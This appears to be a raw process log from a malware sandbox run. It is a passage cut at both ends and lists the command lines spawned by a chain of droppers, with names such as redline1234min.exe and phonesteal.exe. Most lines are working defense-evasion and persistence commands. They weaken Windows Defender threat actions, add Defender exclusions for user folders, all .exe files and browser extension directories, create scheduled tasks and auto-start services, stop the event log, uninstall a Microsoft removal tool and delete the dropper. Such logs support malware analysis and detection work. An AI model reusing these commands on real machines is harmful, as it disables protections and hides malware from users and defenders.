ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe
"C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe" -s
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5392 -ip 5392
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 848
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe
"C:\Users\Admin\AppData\Local\Temp\1000559001\alexlll.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe
"C:\Users\Admin\AppData\Local\Temp\1000560001\father1.exe"
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\olehpsp.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
"C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe
"C:\Users\Admin\AppData\Local\Temp\1000558001\kiliqiuang.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe
"C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 8452 -ip 8452
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8452 -s 2476
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "FLWCUERA"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000564041\do.ps1"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"
C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe
"C:\Users\Admin\AppData\Local\Temp\1000565001\goldprimedfsdf.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000561001\redline1234min.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "FLWCUERA"
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\conhost.exe
conhost.exe
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Users\Admin\AppData\Local\Temp\onefile_2268_133529879094912185\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000572001\judi1234.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AYihtnKUEzNvC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AYihtnKUEzNvC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KqXbavCVBAoU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KqXbavCVBAoU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YoIROqlkSylWiuqmRuR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YoIROqlkSylWiuqmRuR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hWvuMSnmtaUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hWvuMSnmtaUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qLISRvQaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qLISRvQaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kFtOkElpwyMNPVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\kFtOkElpwyMNPVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HLfrKneGcZPtnWVS\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HLfrKneGcZPtnWVS\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "UTIXDCVF"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe
"C:\Users\Admin\AppData\Local\Temp\1000573001\phonesteal.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"
C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe
"C:\Users\Admin\AppData\Local\Temp\1000574001\InstallSetup3.exe"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "UTIXDCVF"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AYihtnKUEzNvC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KqXbavCVBAoU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KqXbavCVBAoU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YoIROqlkSylWiuqmRuR" /t REG_DWORD /d 0 /reg:32
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1648 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1856 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3036 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3056 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3844 --field-trial-handle=2180,i,6059891228756473429,2513094981029991665,131072 /prefetch:1
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YoIROqlkSylWiuqmRuR" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
C:\Users\Admin\AppData\Local\Temp\nsm9EB5.tmp
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hWvuMSnmtaUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hWvuMSnmtaUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qLISRvQaU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qLISRvQaU" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.linkedin.com/login
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.0.275686909\1355031572" -parentBuildID 20221007134813 -prefsHandle 1584 -prefMapHandle 1576 -prefsLen 20804 -prefMapSize 233480 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5abd596c-eb87-4189-936b-7899e544fd2e} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 1748 24bc70e6b58 gpu
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff26379758,0x7fff26379768,0x7fff26379778
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kFtOkElpwyMNPVVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6292 -ip 6292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6292 -s 1388
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\kFtOkElpwyMNPVVB /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.1.2003993816\1855881379" -parentBuildID 20221007134813 -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 20804 -prefMapSize 233480 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d58bfe5-6307-4d33-a35f-fb503dc95c75} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 2108 24bc75e1f58 socket
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.2.655256079\1778261005" -childID 1 -isForBrowser -prefsHandle 2928 -prefMapHandle 2924 -prefsLen 22021 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f5d163a-1757-40d9-9cd0-b3bb3cd008b5} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 2940 24bca880558 tab
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5684.3.561617980\117726505" -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 26427 -prefMapSize 233480 -jsInitHandle 972 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f608c594-d01a-4cdf-a9ee-1e087ad73501} 5684 "\\.\pipe\gecko-crash-server-pipe.5684" 3468 24bb3f62b58 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1904 --field-trial-handle=1620,i,8530759317711239256,3514417821878428945,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
